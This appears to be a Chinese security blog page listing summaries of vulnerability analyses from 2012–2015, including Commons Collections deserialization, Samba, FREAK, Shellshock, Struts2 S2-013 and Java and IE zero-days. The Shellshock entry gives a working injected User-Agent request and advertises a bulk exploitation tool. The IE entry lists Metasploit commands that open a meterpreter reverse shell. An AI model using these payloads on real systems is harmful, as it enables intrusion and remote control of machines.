Deep in Commons Collections Exploitation

0x01 背景 今年公开的Java相关漏洞中,影响力最大的莫过于这段时间持续火热的Commons Collections反序列化漏洞了。 在2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客里,借用Java反序列化和Apache Commons Collections这一基础类库实现远程命令执行的真实案例来到人们的视野,各大Java Web Server纷纷躺枪,这个漏洞横扫WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版。而在将近10个月前, Gabriel Lawrence 和Chris Frohoff 就已经在AppSecCali上的一个报告里提到了这个漏洞利用思路。 目前,针对这个“2015年最被低估”的漏洞,各大受影响的Java应用厂商陆续发布了修复后的版本,Apache Commons Collections项目也对存在漏洞的类库进行了一定的安全处理。

Samba netlogon远程代码执行漏洞分析 CVE-2015-0240

官方漏洞信息 Samba 3.5.0到4.2.0rc4版本的smbd文件服务程序存在一个远程代码执行漏洞,攻击者可以无需登录执行任意代码。 攻击者可以匿名与samba服务器建立空会话连接,然后调用ServerPasswordSet RPC接口,导致一个未初始化的栈指针被传给TALLOC_FREE()函数,通过发送特别构造的数据,可以控制该指针的内容,当该指针被释放时,攻击者可以以root身份执行任意代码。 Samba 4.1以及更高版本需要在服务器配置文件中设置“server schannel = yes”才能触发此漏洞。

FREAK Attack SSL/TLS漏洞分析 CVE-2015-0204

漏洞编号 CVE-2015-0204 描述 客户端OpenSSL的加密算法强度可被静默的降级到EXPORT_RSA级别,而该级别加密算法使用的密钥较弱,导致攻击者可以暴力破解出服务器RSA密钥。影响0.9.8zd之前的版本,以及1.0.0p之前的1.0.0系到和1.0.1k之前的1.0.1系版本。这个漏洞是由s3_clnt.c中的ssl3_get_key_exchange函数造成的。

Android短信越权重发漏洞测试分析

CVE-2014-8610 (此编号暂被保留) 0x1 漏洞信息 漏洞危害 无须用户交互,重发短信信箱内的任意一条或多条短信。进一步的,恶意应用可以创建一个草稿短信,然后通过这个漏洞,在无短信发送权限的情况下,将短信发送出去。 影响版本 Android 5.0以下 POC

KBash – GNU Bash环境变量命令执行 Shellshock检测工具 CVE-2014-6271

GNU Bash 环境变量远程命令执行漏洞 CVE-2014-6271 影响:          GNU Bash <= 4.3 POC: GET /cgi-bin/test.sh HTTP/1.1User-Agent: () { :; }; cp ./test.sh ../3333.txt | chmod 777 ../3333.txt GNU Bash 4.3及之前版本对环境变量的处理过程中存在漏洞,环境变量值中可加入攻击字符,以执行shell命令。某些存在漏洞的服务可直接导致远程命令执行。看这个漏洞闹得这么沸沸扬扬,于是应景写了一个利用工具。支持谷歌批量,支持命令回显。大牛们有啥好玩的利用方法,欢迎交流共享。

Struts2 includeParams属性命令执行漏洞 – S2 013

CVE-2013-1966 描述: Apache Struts2的<s:a>和<s:url>标签都提供了一个includeParams属性。此属性允许使用的值包括none、get、all。当该属性被设置为get或all时,Apache Struts2会将用户提交的参数值作为Ognl表达式执行。攻击者可以提交带有恶意的ONGL表达式,达到执行任意Java代码的目的。只要基于Apache Struts2开发的JSP代码中使用了url/a标签并且设置了includeParams属性为all或get,远程攻击者即可利用此漏执行任意命令。

JRE7u6 Applet绕过沙盒执行恶意代码0day

CVE-2012-4681 描述: 8月份的一个0day,CVE中是这样描述的: 允许远程攻击者构造applet 来调用com.sun.beans.finder.ClassFinder.findClass,从而绕过 SecurityManager的限制。然后 借助 forName方法的一个异常来访问某些package里的限制类,如:sun.awt.SunToolkit,并使用反射的 getField方法来访问和修改私有字段。 在 August 2012 被广泛利用.,EXP为Gondzz.class 和 Gondvv.class。 受影响的版本:Oracle Java SE 7 Update 6 或之前版本 EXP:

IE execCommand函数的远程代码执行0day

CVE-2012-4969 描述: mshtml.dll中的CMshtmlEd::Exec函数释放后重用,导致远程代码执行。远程攻击者可以通过一个精心制作的网站执行特定代码。于2012年9月被广泛利用。 受影响的IE版本:IE6、IE7、IE8、IE9 MSF 测试 : use exploit/windows/browser/ie_execcommand_uaf set SRVHOST 192.168.178.33 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.33 exploit sysinfo getuid